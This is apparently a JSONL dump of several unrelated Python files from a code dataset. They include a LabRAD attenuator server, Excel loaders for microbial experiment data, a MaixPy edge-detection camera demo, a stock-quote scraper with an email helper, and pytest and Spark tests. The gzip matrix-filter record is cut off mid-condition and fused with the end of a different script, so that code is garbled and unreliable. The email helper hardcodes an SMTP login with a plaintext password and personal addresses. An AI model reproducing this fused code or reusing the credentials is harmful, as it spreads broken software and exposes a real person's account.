+{"seq_id":"647599113","text":"# Copyright (C) 2007 Matthew Neeley, Isaac Storch\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n\n\"\"\"\n### BEGIN NODE INFO\n[info]\nname = XY Attenuator Server\nversion = 1.0\ndescription = \n\n[startup]\ncmdline = %PYTHON% %FILE%\ntimeout = 20\n\n[shutdown]\nmessage = 987654321\ntimeout = 20\n### END NODE INFO\n\"\"\"\n\nfrom labrad.gpib import GPIBManagedServer\nfrom labrad.server import setting\nfrom labrad import types as T\nfrom twisted.internet.defer import inlineCallbacks, returnValue\nfrom numpy import floor\n\nclass XYAttenuatorServer(GPIBManagedServer):\n name = 'XY Attenuator Server'\n deviceName = 'Hewlett-Packard 11713A'\n deviceIdentFunc = 'identify_device'\n\n @inlineCallbacks\n def setAtten(self, c, val, commands):\n \"\"\"Helper method to set either the X or Y attenuation.\n\n This method looks up the desired attenuation and gpib\n command in the provided dictionary.\n \"\"\"\n dev = self.selectedDevice(c)\n if val not in commands.keys():\n raise Exception('Invalid attenuation value.')\n\n yield dev.write(commands[val])\n returnValue(T.Value(val, 'dB'))\n\n # settings\n\n @setting(1000, server='s', address='s', idn='s')\n def identify_device(self, c, server, address, idn=None):\n devices = [('ADR GPIB Bus', 'GPIB0::28'),\n ('DR GPIB Bus', 'GPIB0::28'),\n ('Twins IBCL GPIB Bus', 'ProbeStation GPIB-422CT::28'),\n ('T1000 IBCL GPIB Bus', 'T1000 GPIB-422CT::28')]\n if (server, address) in devices:\n return self.deviceName\n\n @setting(10000, \"X Atten\", data=['v[dB]'], returns=['v[dB]'])\n def x_atten(self, c, data):\n \"\"\"Set the X attenuation.\n\n Allowed values of are 0, 1, 2, ... 11 dB.\n \"\"\"\n val = int(data.value)\n return self.setAtten(c, val, XattnDict)\n\n @setting(10001, \"Y Atten\", data=['v[dB]'], returns=['v[dB]'])\n def y_atten(self, c, data):\n \"\"\"Set the Y attenuation.\n\n Allowed values are 0, 10, 20, ... 70 dB.\n \"\"\"\n val = int(data.value)\n return self.setAtten(c, val, YattnDict)\n\n @setting(10002, \"Total Atten\", data=['v[dB]'], returns=['v[dB]v[dB]'])\n def total_atten(self, c, data):\n \"\"\"Set the total attenuation on X and Y channels (connected in series).\n\n Allowed values of are 0, 1, 2, ... 79 dB.\n Note: use x_atten and y_atten to go to 80 and 81 dB\n \"\"\"\n val = int(data.value)\n x = yield self.setAtten(c, val%10, XattnDict)\n y = yield self.setAtten(c, floor(val/10)*10, YattnDict)\n returnValue((x,y))\n\n# commands for X attenuation\nXattnDict = {\n 0: 'B1234',\n 1: 'A1B234',\n 2: 'A2B134',\n 3: 'A12B34',\n 4: 'A3B124',\n 5: 'A13B24',\n 6: 'A23B14',\n 7: 'A123B4',\n 8: 'A34B12',\n 9: 'A134B2',\n 10: 'A234B1',\n 11: 'A1234'\n}\n\n# commands for Y attenuation\nYattnDict = {\n 0: 'B5678',\n 10: 'A5B678',\n 20: 'A6B578',\n 30: 'A56B78',\n 40: 'A7B568',\n 50: 'A57B68',\n 60: 'A67B58',\n 70: 'A567B8'\n}\n\n__server__ = XYAttenuatorServer()\n\nif __name__ == '__main__':\n from labrad import util\n util.runServer(__server__)\n","sub_path":"xyattenuators.py","file_name":"xyattenuators.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"431622620","text":"from pandas import *\nfrom batch_fitting_class import *\nimport matplotlib.backends.backend_pdf\n\n\n####################################################################\n# start with different substrates\n####################################################################\n\n# read from excel into a pandas dataframe\nss = read_excel(\"DMSP_dosage.xlsx\", \"substrate_forpy\")\n\n# times\ndtimes = array(ss['T'])\n\n# convert to numpy arrays\na1 = array(ss['A_2090'])\na1D = array(ss['A_2090_DMSP'])\na1G = array(ss['A_2090_Glycerol'])\na1P = array(ss['A_2090_Proprionate'])\na1b = array(ss['A_2090_D7'])\na1bD = array(ss['A_2090_D7_DMSP'])\na1bG = array(ss['A_2090_D7_Glycerol'])\na1bP = array(ss['A_2090_D7_Proprionate'])\na2 = array(ss['A_379'])\na2D = array(ss['A_379_DMSP'])\na2G = array(ss['A_379_Glycerol'])\na2P = array(ss['A_379_Proprionate'])\na2b = array(ss['A_379_D7'])\na2bD = array(ss['A_379_D7_DMSP'])\na2bG = array(ss['A_379_D7_Glycerol'])\na2bP = array(ss['A_379_D7_Proprionate'])\nb1 = array(ss['B_2090'])\nb1D = array(ss['B_2090_DMSP'])\nb1G = array(ss['B_2090_Glycerol'])\nb1P = array(ss['B_2090_Proprionate'])\nb1a = array(ss['B_2090_D7'])\nb1aD = array(ss['B_2090_D7_DMSP'])\nb1aG = array(ss['B_2090_D7_Glycerol'])\nb1aP = array(ss['B_2090_D7_Proprionate'])\nb2 = array(ss['B_379'])\nb2D = array(ss['B_379_DMSP'])\nb2G = array(ss['B_379_Glycerol'])\nb2P = array(ss['B_379_Proprionate'])\nb2a = array(ss['B_379_D7'])\nb2aD = array(ss['B_379_D7_DMSP'])\nb2aG = array(ss['B_379_D7_Glycerol'])\nb2aP = array(ss['B_379_D7_Proprionate'])\n\na1sd = array(ss['A_2090_sd'])\na1Dsd = array(ss['A_2090_DMSP_sd'])\na1Gsd = array(ss['A_2090_Glycerol_sd'])\na1Psd = array(ss['A_2090_Proprionate_sd'])\na1bsd = array(ss['A_2090_D7_sd'])\na1bDsd = array(ss['A_2090_D7_DMSP_sd'])\na1bGsd = array(ss['A_2090_D7_Glycerol_sd'])\na1bPsd = array(ss['A_2090_D7_Proprionate_sd'])\na2sd = array(ss['A_379_sd'])\na2Dsd = array(ss['A_379_DMSP_sd'])\na2Gsd = array(ss['A_379_Glycerol_sd'])\na2Psd = array(ss['A_379_Proprionate_sd'])\na2bsd = array(ss['A_379_D7_sd'])\na2bDsd = array(ss['A_379_D7_DMSP_sd'])\na2bGsd = array(ss['A_379_D7_Glycerol_sd'])\na2bPsd = array(ss['A_379_D7_Proprionate_sd'])\nb1sd = array(ss['B_2090_sd'])\nb1Dsd = array(ss['B_2090_DMSP_sd'])\nb1Gsd = array(ss['B_2090_Glycerol_sd'])\nb1Psd = array(ss['B_2090_Proprionate_sd'])\nb1asd = array(ss['B_2090_D7_sd'])\nb1aDsd = array(ss['B_2090_D7_DMSP_sd'])\nb1aGsd = array(ss['B_2090_D7_Glycerol_sd'])\nb1aPsd = array(ss['B_2090_D7_Proprionate_sd'])\nb2sd = array(ss['B_379_sd'])\nb2Dsd = array(ss['B_379_DMSP_sd'])\nb2Gsd = array(ss['B_379_Glycerol_sd'])\nb2Psd = array(ss['B_379_Proprionate_sd'])\nb2asd = array(ss['B_379_D7_sd'])\nb2aDsd = array(ss['B_379_D7_DMSP_sd'])\nb2aGsd = array(ss['B_379_D7_Glycerol_sd'])\nb2aPsd = array(ss['B_379_D7_Proprionate_sd'])\n\n# put in dictionaries\ncont_a2090 = {'htimes': dtimes, 'hms': a1, 'hss': a1sd}\ncontD_a2090 = {'htimes': dtimes, 'hms': a1D, 'hss': a1Dsd}\ncontG_a2090 = {'htimes': dtimes, 'hms': a1G, 'hss': a1Gsd}\ncontP_a2090 = {'htimes': dtimes, 'hms': a1P, 'hss': a1Psd}\n\ncont_b2090 = {'htimes': dtimes, 'hms': b1, 'hss': b1sd}\ncontD_b2090 = {'htimes': dtimes, 'hms': b1D, 'hss': b1Dsd}\ncontG_b2090 = {'htimes': dtimes, 'hms': b1G, 'hss': b1Gsd}\ncontP_b2090 = {'htimes': dtimes, 'hms': b1P, 'hss': b1Psd}\n\ninf_2090 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a1b, 'vms': b1a, 'hss': a1bsd, 'vss': b1asd}\ninfD_2090 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a1bD, 'vms': b1aD, 'hss': a1bDsd, 'vss': b1aDsd}\ninfG_2090 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a1bG, 'vms': b1aG, 'hss': a1bGsd, 'vss': b1aGsd}\ninfP_2090 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a1bP, 'vms': b1aP, 'hss': a1bPsd, 'vss': b1aPsd}\n\n# put in dictionaries\ncont_a379 = {'htimes': dtimes, 'hms': a2, 'hss': a2sd}\ncontD_a379 = {'htimes': dtimes, 'hms': a2D, 'hss': a2Dsd}\ncontG_a379 = {'htimes': dtimes, 'hms': a2G, 'hss': a2Gsd}\ncontP_a379 = {'htimes': dtimes, 'hms': a2P, 'hss': a2Psd}\n\ncont_b379 = {'htimes': dtimes, 'hms': b2, 'hss': b2sd}\ncontD_b379 = {'htimes': dtimes, 'hms': b2D, 'hss': b2Dsd}\ncontG_b379 = {'htimes': dtimes, 'hms': b2G, 'hss': b2Gsd}\ncontP_b379 = {'htimes': dtimes, 'hms': b2P, 'hss': b2Psd}\n\ninf_379 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a2b, 'vms': b2a, 'hss': a2bsd, 'vss': b2asd}\ninfD_379 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a2bD, 'vms': b2aD, 'hss': a2bDsd, 'vss': b2aDsd}\ninfG_379 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a2bG, 'vms': b2aG, 'hss': a2bGsd, 'vss': b2aGsd}\ninfP_379 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a2bP, 'vms': b2aP, 'hss': a2bPsd, 'vss': b2aPsd}\n\n####################################################################\n# now do DMSP dosage\n####################################################################\n\n# read excel sheet into a pandas dataframe\nss = read_excel(\"DMSP_dosage.xlsx\", \"doses_forpy\")\n\n# times\ndtimes = array(ss['T'])\n\n# convert data from pandas data frame to arrays\na0 = array(ss['A_379_0'])\na10 = array(ss['A_379_10'])\na100 = array(ss['A_379_100'])\na500 = array(ss['A_379_500'])\nab0 = array(ss['A_379_D7_0'])\nab10 = array(ss['A_379_D7_10'])\nab100 = array(ss['A_379_D7_100'])\nab500 = array(ss['A_379_D7_500'])\nb0 = array(ss['B_379_0'])\nb10 = array(ss['B_379_10'])\nb100 = array(ss['B_379_100'])\nb500 = array(ss['B_379_500'])\nba0 = array(ss['B_379_D7_0'])\nba10 = array(ss['B_379_D7_10'])\nba100 = array(ss['B_379_D7_100'])\nba500 = array(ss['B_379_D7_500'])\n\na0sd = array(ss['A_379_0_sd'])\na10sd = array(ss['A_379_10_sd'])\na100sd = array(ss['A_379_100_sd'])\na500sd = array(ss['A_379_500_sd'])\nab0sd = array(ss['A_379_D7_0_sd'])\nab10sd = array(ss['A_379_D7_10_sd'])\nab100sd = array(ss['A_379_D7_100_sd'])\nab500sd = array(ss['A_379_D7_500_sd'])\nb0sd = array(ss['B_379_0_sd'])\nb10sd = array(ss['B_379_10_sd'])\nb100sd = array(ss['B_379_100_sd'])\nb500sd = array(ss['B_379_500_sd'])\nba0sd = array(ss['B_379_D7_0_sd'])\nba10sd = array(ss['B_379_D7_10_sd'])\nba100sd = array(ss['B_379_D7_100_sd'])\nba500sd = array(ss['B_379_D7_500_sd'])\n\n# put in dictionaries to call the function\ncont_a0 = {'htimes': dtimes, 'hms': a0, 'hss': a0sd}\ncont_a10 = {'htimes': dtimes, 'hms': a10, 'hss': a10sd}\ncont_a100 = {'htimes': dtimes, 'hms': a100, 'hss': a100sd}\ncont_a500 = {'htimes': dtimes, 'hms': a500, 'hss': a500sd}\n\ncont_b0 = {'htimes': dtimes, 'hms': b0, 'hss': b0sd}\ncont_b10 = {'htimes': dtimes, 'hms': b10, 'hss': b10sd}\ncont_b100 = {'htimes': dtimes, 'hms': b100, 'hss': b100sd}\ncont_b500 = {'htimes': dtimes, 'hms': b500, 'hss': b500sd}\n\ninf_0 = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': ab0, 'vms': ba0, 'hss': ab0sd, 'vss': ba0sd}\ninf_10 = {'htimes': dtimes, 'vtimes': dtimes, 'hms': ab10,\n 'vms': ba10, 'hss': ab10sd, 'vss': ba10sd}\ninf_100 = {'htimes': dtimes, 'vtimes': dtimes, 'hms': ab100,\n 'vms': ba100, 'hss': ab100sd, 'vss': ba100sd}\ninf_500 = {'htimes': dtimes, 'vtimes': dtimes, 'hms': ab500,\n 'vms': ba500, 'hss': ab500sd, 'vss': ba500sd}\n\n####################################################################\n# now do data from mixed experiments\n####################################################################\n\n# read excel sheet into a pandas dataframe\nsv = read_excel(\"DMSP_dosage.xlsx\", \"vir_forpy\")\nsb = read_excel(\"DMSP_dosage.xlsx\", \"bac_forpy\")\noh = read_excel(\"DMSP_dosage.xlsx\", \"onehost_forpy\")\nth = read_excel(\"DMSP_dosage.xlsx\", \"twohost_forpy\")\n\n# convert to numpy arrays\n# times\ndtimes = array(sv['T'])\n\n# algae\na2090 = array(sv['A_2090'])\na2090v = array(sv['A_2090_V'])\na2090b = array(sb['A_2090_D7'])\na2090vb = array(oh['A_2090_D7_V'])\na379 = array(sb['A_379'])\na379b = array(sb['A_379_D7'])\na379vb = array(oh['A_379_D7_V'])\na2090a379 = array(th['A_2090_A_379'])\na2090a379v = array(th['A_2090_A_379_V'])\na2090a379b = array(th['A_2090_A_379_D7'])\na2090a379vb = array(th['A_2090_A_379_D7_V'])\n\n# bacteria\nb2090b = array(sb['B_A_2090_D7'])\nb2090vb = array(oh['B_A_2090_D7_V'])\nb = array(sb['B'])\nb379b = array(sb['B_A_379_D7'])\nb379vb = array(oh['B_A_379_D7_V'])\nba2090a379b = array(th['B_A_2090_A_379_D7'])\nba2090a379vb = array(th['B_A_2090_A_379_D7_V'])\n\n# bacteria\nv2090v = array(sv['V_A_2090_V'])\nv2090vb = array(oh['V_A_2090_D7_V'])\nv379vb = array(oh['V_A_379_D7_V'])\nva2090a379b = array(th['V_A_2090_A_379_D7'])\nva2090a379vb = array(th['V_A_2090_A_379_D7_V'])\n\n# algae\na2090sd = array(sv['A_2090_sd'])\na2090vsd = array(sv['A_2090_V_sd'])\na2090bsd = array(sb['A_2090_D7_sd'])\na2090vbsd = array(oh['A_2090_D7_V_sd'])\na379sd = array(sb['A_379_sd'])\na379bsd = array(sb['A_379_D7_sd'])\na379vbsd = array(oh['A_379_D7_V_sd'])\na2090a379sd = array(th['A_2090_A_379_sd'])\na2090a379vsd = array(th['A_2090_A_379_V_sd'])\na2090a379bsd = array(th['A_2090_A_379_D7_sd'])\na2090a379vbsd = array(th['A_2090_A_379_D7_V_sd'])\n\n# bacteria\nb2090bsd = array(sb['B_A_2090_D7_sd'])\nb2090vbsd = array(oh['B_A_2090_D7_V_sd'])\nbsd = array(sb['B_sd'])\nb379bsd = array(sb['B_A_379_D7_sd'])\nb379vbsd = array(oh['B_A_379_D7_V_sd'])\nba2090a379bsd = array(th['B_A_2090_A_379_D7_sd'])\nba2090a379vbsd = array(th['B_A_2090_A_379_D7_V_sd'])\n\n# bacteria\nv2090vsd = array(sv['V_A_2090_V_sd'])\nv2090vbsd = array(oh['V_A_2090_D7_V_sd'])\nv379vbsd = array(oh['V_A_379_D7_V_sd'])\nva2090a379bsd = array(th['V_A_2090_A_379_D7_sd'])\nva2090a379vbsd = array(th['V_A_2090_A_379_D7_V_sd'])\n\n# put in dictionaries for fitting\ncont_2090 = {'htimes': dtimes, 'hms': a2090, 'hss': a2090sd}\ncont_379 = {'htimes': dtimes, 'hms': a379, 'hss': a379sd}\ncont_D7 = {'htimes': dtimes, 'hms': b, 'hss': bsd}\n\ninf_379bac = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a379b, 'vms': b379b, 'hss': a379bsd, 'vss': b379bsd}\ninf_2090bac = {'htimes': dtimes, 'vtimes': dtimes,\n 'hms': a2090b, 'vms': b2090b, 'hss': a2090bsd, 'vss': b2090bsd}\ninf_2090vir = {'htimes': dtimes[:6], 'vtimes': dtimes[:6], 'hms': a2090v[:6],\n 'vms': v2090v[:6], 'hss': a2090vsd[:6], 'vss': v2090vsd[:6]}\n","sub_path":"mikrodyno_depHeroku/read_all_data.py","file_name":"read_all_data.py","file_ext":"py","file_size_in_byte":9933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"152187255","text":"from maix import nn\nfrom PIL import Image, ImageDraw\nimport numpy as np\nimport time\nfrom maix import display, camera\n\ncamera.config(size=(224, 224))\n\nmodel = {\n \"param\": \"/root/models/sobel_int8.param\",\n \"bin\": \"/root/models/sobel_int8.bin\"\n}\n\ninput_size = (224, 224, 3)\noutput_size = (222, 222, 3)\n\noptions = {\n \"model_type\": \"awnn\",\n \"inputs\": {\n \"input0\": input_size\n },\n \"outputs\": {\n \"output0\": output_size\n },\n \"mean\": [127.5, 127.5, 127.5],\n \"norm\": [0.0078125, 0.0078125, 0.0078125],\n}\nprint(\"-- load model:\", model)\nm = nn.load(model, opt=options)\nprint(\"-- load ok\")\n\nwhile 1:\n img = camera.capture()\n if not img:\n time.sleep(0.01)\n continue\n print(\"-- read image ok\")\n print(\"-- forward model with image as input\")\n out = m.forward(img, quantize=True, layout=\"hwc\")\n # print(\"-- read image ok\")\n # out = out.reshape(222, 222, 3)\n print(\"-- out:\", out.shape, out.dtype)\n out = out.astype(np.float32).reshape(output_size)\n out = (np.abs(out) * 255 / out.max()).astype(np.uint8)\n img2 = Image.fromarray(out, mode=\"RGB\")\n\n display.show(img2)\n","sub_path":"ext_modules/_maix_nn/example/load_forward_sobel_edge_camera.py","file_name":"load_forward_sobel_edge_camera.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"476168010","text":"from sys import argv,stderr\nfrom gzip import open as gzopen\n\nmatrixIn=argv[1]\nvalidSpecimensIn=argv[2]\nvalidProbes=set()\nnumValidProbes=0\nif len(argv)==4:\n validProbeFile=argv[3]\n with open(validProbeFile) as f:\n for line in f:\n validProbes.add(line.rstrip())\n numValidProbes+=1 \n\nvalidSpecimens=set()\nvalidDonors=set()\nwith open(validSpecimensIn) as f:\n for line in f:\n validSpecimens.add(line.rstrip())\n validDonors.add('-'.join(line.rstrip().split('-')[:-1]))\n\nwith gzopen(matrixIn,'rt') as f:\n processedSpecimens=set()\n headerChunks=next(f).rstrip().split('\\t')\n validColumns=[0]\n for i in range(1,len(headerChunks)):\n currentSpecimen=headerChunks[i]\n if not currentSpecimen[-1].isdigit():\n currentSpecimen=currentSpecimen[:-1]\n specimenChunks=currentSpecimen.split('-')\n healthySpecimen=int(specimenChunks[-1])>10\n currentDonor='-'.join(specimenChunks[:-1])\n validDonor=False\n if currentSpecimen in validSpecimens or (healthySpecimen and currentDonor in validDonors):\n if currentSpecimen not in processedSpecimens:\n processedSpecimens.add(currentSpecimen)\n validColumns.append(i)\n filteredChunks=[]\n for i in validColumns:\n if i>0:\n if not headerChunks[i][-1].isdigit():\n headerChunks[i]=headerChunks[i][:-1]\n filteredChunks.append(headerChunks[i])\n print(*filteredChunks,sep='\\t')\n expectedColumns=len(headerChunks)\n for line in f:\n lineChunks=line.rstrip().split('\\t')\n if lineChunks[0].startswith(\"ENSGR\"):\n continue\n if lineChunks[0].startswith(\"ENSG\"):\n lineChunks[0]=lineChunks[0].split('.')[0]\n currentColumns=len(lineChunks)\n if currentColumns==1:\n continue\n if numValidProbes>0:\n if lineChunks[0] not in validProbes:\n continue\n if currentColumns 1:\n main(args[1])\n else:\n main()","sub_path":"test/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"29979169","text":"'''\nCreated on 25th/June/2017\n\n@author: aubrey.wang\n'''\n\nimport email.mime.multipart\nimport email.mime.text\nimport smtplib\nimport time, datetime\nfrom urllib import error\nimport urllib.request\n\n\ndef get_raw_url(req_name, list_data):\n website = 'http://hq.sinajs.cn/list=s_' + req_name;\n \n try:\n resp = urllib.request.urlopen(website)\n html = resp.read() \n\n except error.URLError as e:\n print('URLError reason: ', e.reason)\n \n # resp = urllib.request.urlopen(website)\n # html = resp.read()\n\n str = html.decode('gbk', 'ignore');\n\n # print(time.strftime(\"%Y-%m-%d %H:%M:%S\"),str)\n \n flag_colon_appear = 0\n data_order = 0\n str_data = \"\"\n piece_data = []\n\n for char in str:\n if (char == ',') and (flag_colon_appear == 0):\n piece_data.append(req_name)\n flag_colon_appear = 1\n continue\n \n if (char == ',') and (flag_colon_appear == 1):\n flag_colon_appear = 1 \n piece_data.append( (float) (str_data) )\n \n str_data = ''\n continue\n \n if (char == '\"') and (flag_colon_appear == 1):\n flag_colon_appear = 1\n \n piece_data.append( (float) (str_data) )\n # piece_data.insert(0, time.strftime(\"%Y-%m-%d %H:%M:%S\") )\n piece_data.insert(0, time.time())\n \n print('piece_data:', piece_data)\n \n list_data.append(piece_data)\n \n piece_data = []\n str_data = ''\n \n data_order += 1\n continue\n \n if flag_colon_appear == 1:\n str_data += char \n return list_data\n\ndef get_newest_data(stock_raw_data_list):\n for get_newest_data_i in reversed(stock_raw_data_list):\n # print('get_newest_data_name:',get_newest_data_i)\n # print('data length:',len(stock_raw_data_list))\n return get_newest_data_i\n \ndef is_trade_time():\n is_trade_time = ( (datetime.datetime.now().hour == 9) and (datetime.datetime.now().minute > 29) ) \\\n or (datetime.datetime.now().hour == 10) \\\n or ( (datetime.datetime.now().hour == 11) and (datetime.datetime.now().minute < 31) ) \\\n or (datetime.datetime.now().hour == 13) \\\n or (datetime.datetime.now().hour == 14) \\\n or ( (datetime.datetime.now().hour == 15) and (datetime.datetime.now().minute < 1) )\n \n return is_trade_time\n\ndef list_write2file(file_name, send_list):\n file_to_write = open(file_name,'a')\n\n for item in send_list:\n file_to_write.write(str(item)[1:-1]+'\\n')\n \n file_to_write.close()\n \ndef send_mail(flag, strdata):\n msg = email.mime.multipart.MIMEMultipart()\n msg['from'] = '18566260586m@sina.cn'\n msg['to'] = '18566260586@163.com'\n msg['subject'] = flag\n \n content = strdata\n \n txt = email.mime.text.MIMEText(content)\n \n msg.attach(txt)\n \n smtp=smtplib.SMTP()\n \n smtp.connect('smtp.sina.cn', '25')\n smtp.login('18566260586m@sina.cn', 'wk19910415')\n \n smtp.sendmail(\"18566260586m@sina.cn\",\"18566260586@163.com\",str(msg))\n smtp.quit()\n \n print(time.strftime(\"%Y-%m-%d %H:%M:%S\"), ' send_data:', flag)","sub_path":"app_main/app_data_io.py","file_name":"app_data_io.py","file_ext":"py","file_size_in_byte":3274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"191899194","text":"#!/usr/bin/env python3\n# -*- coding:UTF-8 -*-\n\nfrom __future__ import print_function\n\nfrom __future__ import absolute_import\n\nimport subprocess\nfrom sys import stdout\n\n\ndef main():\n print('start....')\n #TerminalCheck.py -a 192.168.0.109 -p 0 0\n# proc = subprocess.Popen('python3 TerminalCheck.py -a 192.168.0.109 -p 0 0'\n# ,stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n# stderr=subprocess.PIPE,shell=True)\n \n# proc = subprocess.Popen('python3 TerminalCheck.py -a 192.168.0.109 -p 0 0'\n# ,shell=True)\n# print('haha')\n# while True:\n# output, usrerror = proc.communicate(timeout=2)\n# print(output)\n \n \n proc1 = subprocess.Popen('python3 call_sub.py'\n ,stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,shell=True)\n exe_result1 = proc1.stdout.read()\n print(\"mdsb:\" + exe_result1.decode())\n \n now_md5sum = subprocess.check_output(\"md5sum config.txt\",shell=True)\n print(\"now_md5sum:\" + now_md5sum.decode())\n \nif __name__ == '__main__':\n main()","sub_path":"step1/configobj_test/subprocess_test.py","file_name":"subprocess_test.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"241551054","text":"\"\"\" Tests for `yatsm.gis.tilespec`\n\"\"\"\nimport pytest\n\nfrom yatsm.gis import tilespec\n\n\n@pytest.fixture\ndef example_spec(request):\n for k in tilespec.TILESPECS:\n return tilespec.TILESPECS[k]\n\n\nEX_CRS_GEOG = (\n (0., 0.),\n 'epsg:4326',\n (0.00025, 0.0025),\n (1., 1.),\n 'geographic'\n)\nEX_CRS_ALBERS = (\n (-2565600., 3314800.),\n 'epsg:5070',\n (30, 30),\n (250, 250),\n 'albers_conus'\n)\nEX_CRS_UTM = (\n (653385., 4828815.),\n 'epsg:32619',\n (30, 30),\n (5000, 5000),\n 'utm19n'\n)\n\n\ntilespec_params = pytest.mark.parametrize(\n ('ul', 'crs', 'res', 'size', 'desc'),\n [EX_CRS_GEOG,\n EX_CRS_ALBERS,\n EX_CRS_UTM]\n)\n\n\n# tilezilla.tilespec.TileSpec\n@tilespec_params\ndef test_tilespec(ul, crs, res, size, desc):\n tilespec.TileSpec(ul, crs, res, size, desc=desc)\n\n\n# FAILURE: CRS PARSING PROBLEMS\n@tilespec_params\ndef test_tilespec_fail_crs_1(ul, crs, res, size, desc):\n with pytest.raises(ValueError):\n tilespec.TileSpec(ul, 'not a crs', res, size, desc)\n\n\n# FAILURE: INDEXING PROBLEMS\ndef test_tilespec_fail_1(example_spec):\n with pytest.raises(IndexError):\n example_spec[-1]\n\n\ndef test_tilespec_fail_2(example_spec):\n with pytest.raises(TypeError):\n example_spec[([0, 1], [0, 1])]\n","sub_path":"tests/gis/test_gis_tilespec.py","file_name":"test_gis_tilespec.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"612322572","text":"# Prepare training and test data.\nimport os\nimport pyspark\nimport unittest\nimport xmlrunner\nfrom mmlspark.RankingAdapter import RankingAdapter\nfrom mmlspark.RankingEvaluator import RankingEvaluator\nfrom mmlspark.RankingTrainValidationSplit import RankingTrainValidationSplit, RankingTrainValidationSplitModel\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.feature import StringIndexer\nfrom pyspark.ml.tuning import *\nfrom pyspark.ml.tuning import *\nfrom pyspark.sql.types import *\nfrom pyspark.ml.recommendation import ALS\n\n\nclass RankingSpec(unittest.TestCase):\n\n @staticmethod\n def getRatings():\n cSchema = StructType([StructField(\"originalCustomerID\", IntegerType()),\n StructField(\"newCategoryID\", IntegerType()),\n StructField(\"rating\", IntegerType()),\n StructField(\"notTime\", IntegerType())])\n\n ratings = pyspark.sql.SparkSession.builder.getOrCreate().createDataFrame([\n (0, 1, 4, 4),\n (0, 3, 1, 1),\n (0, 4, 5, 5),\n (0, 5, 3, 3),\n (0, 7, 3, 3),\n (0, 9, 3, 3),\n (0, 10, 3, 3),\n (1, 1, 4, 4),\n (1, 2, 5, 5),\n (1, 3, 1, 1),\n (1, 6, 4, 4),\n (1, 7, 5, 5),\n (1, 8, 1, 1),\n (1, 10, 3, 3),\n (2, 1, 4, 4),\n (2, 2, 1, 1),\n (2, 3, 1, 1),\n (2, 4, 5, 5),\n (2, 5, 3, 3),\n (2, 6, 4, 4),\n (2, 8, 1, 1),\n (2, 9, 5, 5),\n (2, 10, 3, 3),\n (3, 2, 5, 5),\n (3, 3, 1, 1),\n (3, 4, 5, 5),\n (3, 5, 3, 3),\n (3, 6, 4, 4),\n (3, 7, 5, 5),\n (3, 8, 1, 1),\n (3, 9, 5, 5),\n (3, 10, 3, 3)], cSchema)\n return ratings\n\n @staticmethod\n def get_pyspark():\n return pyspark.sql.SparkSession.builder.master(\"local[*]\").config('spark.driver.extraClassPath',\n \"../../../../../BuildArtifacts/packages/m2/com/microsoft/ml/spark/mmlspark_2.11/0.0/mmlspark_2.11-0.0.jar\").getOrCreate()\n\n def test_adapter_evaluator(self):\n self.get_pyspark()\n\n ratings = self.getRatings()\n\n user_id = \"originalCustomerID\"\n item_id = \"newCategoryID\"\n rating_id = 'rating'\n\n user_id_index = \"customerID\"\n item_id_index = \"itemID\"\n\n customer_indexer = StringIndexer(inputCol=user_id, outputCol=user_id_index).fit(ratings)\n items_indexer = StringIndexer(inputCol=item_id, outputCol=item_id_index).fit(ratings)\n\n als = ALS(userCol=user_id_index, itemCol=item_id_index, ratingCol=rating_id)\n\n adapter = RankingAdapter(mode='allUsers', k=5, recommender=als)\n\n pipeline = Pipeline(stages=[customer_indexer, items_indexer, adapter])\n output = pipeline.fit(ratings).transform(ratings)\n print(str(output.take(1)) + \"\\n\")\n\n metrics = ['ndcgAt', 'fcp', 'mrr']\n for metric in metrics:\n print(metric + \": \" + str(RankingEvaluator(k=3, metricName=metric).evaluate(output)))\n\n\nif __name__ == \"__main__\":\n result = unittest.main(testRunner=xmlrunner.XMLTestRunner(output=os.getenv(\"TEST_RESULTS\", \"TestResults\")), \\\n failfast=False, buffer=False, catchbreak=False)\n","sub_path":"src/recommendation/src/test/python/RankingSpec.py","file_name":"RankingSpec.py","file_ext":"py","file_size_in_byte":3393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
